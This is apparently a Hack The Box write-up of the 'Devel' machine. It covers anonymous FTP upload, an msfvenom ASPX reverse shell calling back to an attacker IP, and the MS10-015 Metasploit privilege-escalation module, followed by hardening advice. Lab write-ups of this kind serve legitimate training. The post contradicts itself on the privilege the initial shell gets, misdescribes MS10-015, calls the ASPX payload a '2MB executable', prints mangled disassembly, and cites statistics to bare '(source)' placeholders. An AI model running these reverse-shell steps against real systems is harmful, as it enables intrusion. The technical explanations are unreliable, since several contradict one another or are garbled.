Keep Calm and Hack The Box – Devel

As a full-stack developer, you know the importance of securing your applications and infrastructure. But with so many moving parts and potential vulnerabilities, it can be challenging to identify and prioritize risks. This is where ethical hacking platforms like Hack The Box come in – they provide hands-on practice exploiting common vulnerabilities in a safe, legal environment.

Today, we‘ll walk through compromising the Devel machine, a beginner-friendly box that demonstrates the dangers of insecure default configurations. By exploiting a misconfigured FTP server and leveraging a known privilege escalation flaw, we‘ll gain SYSTEM access and capture the flags.

But this isn‘t just another step-by-step walkthrough. As we go, I‘ll share some professional insights on secure coding, server hardening, and patch management to help you level up your cybersecurity skills. We‘ll dive deep into the technical details of the exploits while exploring defensive strategies to mitigate these risks.

The Risks of Default Configurations

One of the most common issues in application and server security is leaving default settings in place. According to the Verizon Data Breach Investigations Report, misconfigurations were the second most common threat action in data breaches in 2021, accounting for 14% of all breaches.

Attackers constantly scan for open ports and banner grab services to identify potential targets. Default credentials, open permissions, and unpatched flaws are low-hanging fruit they look to exploit. In the case of Devel, having an FTP server accessible anonymously and able to serve files to the web root opens the door for uploading malicious code.

To illustrate, let‘s look at some statistics on default FTP configurations from a 2009 study that scanned over 10 million FTP servers:

• 1.1 million FTP servers allowed anonymous access (11%)
• 23% of FTP servers were still using default welcome messages
• 35% of FTP servers provided write access to users

While this data is dated, misconfigured FTP remains a problem to this day. For example, in 2021 Rapid7 found over 1.3 million internet-facing FTP servers, with 32% allowing anonymous authentication. Regularly auditing configurations and permissions is crucial to avoid being an easy target.

Exploiting the FTP Server

After discovering anonymous FTP access and the ability to serve uploaded files on the web server, getting an initial foothold is trivial. We‘ll use msfvenom to generate an ASPX reverse shell payload and set up a handler in Metasploit:


msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=4444 -f aspx > devel-shell.aspx

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 4444
run


Here‘s a closer look at how msfvenom constructs the reverse shell:

1. It uses a Windows executable template, in this case a Meterpreter payload
2. The source IP and port for the reverse listener are configured with LHOST/LPORT
3. EXITFUNC is set to thread, so the payload runs in the background without crashing the process
4. The payload is encoded to evade basic antivirus detection
5. The -f option outputs the payload in the specified format, ASPX

After uploading devel-shell.aspx via FTP and triggering it through the browser, you should catch a SYSTEM shell in your Metasploit listener. For a tiny 2MB executable, it packs quite a punch!

Privilege Escalation with MS10-015

While having a SYSTEM shell right off the bat makes privilege escalation unnecessary, let‘s still walk through exploiting the MS10-015 KiTrap0D vulnerability. This flaw allows an attacker to gain SYSTEM from an Administrator account by exploiting a null pointer dereference in the KiTrap0D function of the Windows kernel.

First, some quick statistics on the prevalence of privilege escalation vulnerabilities:

• In 2021, 56% of all Microsoft CVEs allowed privilege escalation (source)
• Out of 1,212 exploits published in 2021, 588 (49%) were privilege escalation exploits (source)

To exploit MS10-015 in Metasploit:


use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
set LHOST 10.10.14.7
set LPORT 5555
run


Under the hood, this module abuses the null dereference by causing the NT kernel to execute code at an address controlled by the attacker. Here‘s a simplified look at the vulnerable disassembly code:


mov eax, [esi+4] test eax, eax
jz short loc_7
mov ecx, [eax] mov [edi+44h], ecx


The KiTrap0D function doesn‘t properly check the pointer before dereferencing it, so an attacker can pass in a user-supplied value to control code execution. The exploit uses a token stealing payload to copy the SYSTEM token and hijack the privileged process.

To dig deeper, I highly recommend the detailed analysis of MS10-015 by MWR Labs. They break down each step of the exploit from an assembly perspective.

Defense in Depth Strategies

As a developer, practicing offensive security helps you build an attacker mindset and identify risks proactively. But equally important is learning defensive strategies to harden your applications against these common exploit chains. Here are some recommendations:

Secure FTP Configuration

• Disable anonymous access unless absolutely required
• Use strong credentials and consider enforcing password rotation
• Implement IP restrictions and rate limiting
• Configure TLS/SSL for encrypted file transfers (FTPS)

File Upload Validation

• Whitelist allowed file types and extensions
• Verify file contents match the expected type
• Scan uploads with antivirus/antimalware tools
• Serve uploads from a separate domain to prevent XSS

Patch Management

• Keep all operating systems and software up to date
• Prioritize updates for public-facing servers and critical vulnerabilities
• Implement a formal patch management program and track KPIs
• Consider using automated patch management tools like WSUS or Ansible

Principle of Least Privilege

• Provide users and processes with the minimum permissions required
• Avoid administrative/root privileges when not needed
• Implement role-based access control in your applications
• Regularly audit permissions and group memberships

By adding multiple layers of security and focusing on secure configurations, careful file handling, consistent patching, and permission management, you can significantly reduce your attack surface and prevent common exploit vectors.

Conclusion and Key Takeaways

Hacking the Devel machine was a great introduction to exploiting insecure defaults, uploading malicious payloads, and escalating privileges. But more than just a step-by-step guide, I hope this post equipped you with some valuable insights and practical strategies for secure development and server administration.

As a developer, it‘s crucial to shift security left and incorporate defensive practices throughout the SDLC. By proactively identifying risks, implementing layered security controls, and keeping your systems patched and properly configured, you can prevent many of the vulnerabilities exploited in boxes like Devel.

But security is a continuous journey, not a destination. To truly level up your cybersecurity skills, I encourage you to keep exploring platforms like Hack The Box, VulnHub, and PentesterLab. Hands-on practice is invaluable for building your offensive and defensive capabilities.

Finally, remember that security is a team sport. Collaborate with your peers, share your knowledge, and don‘t be afraid to ask for help when you get stuck. The infosec community is full of passionate professionals who are eager to learn and help others grow.

So keep calm, hack the box, and happy secure coding!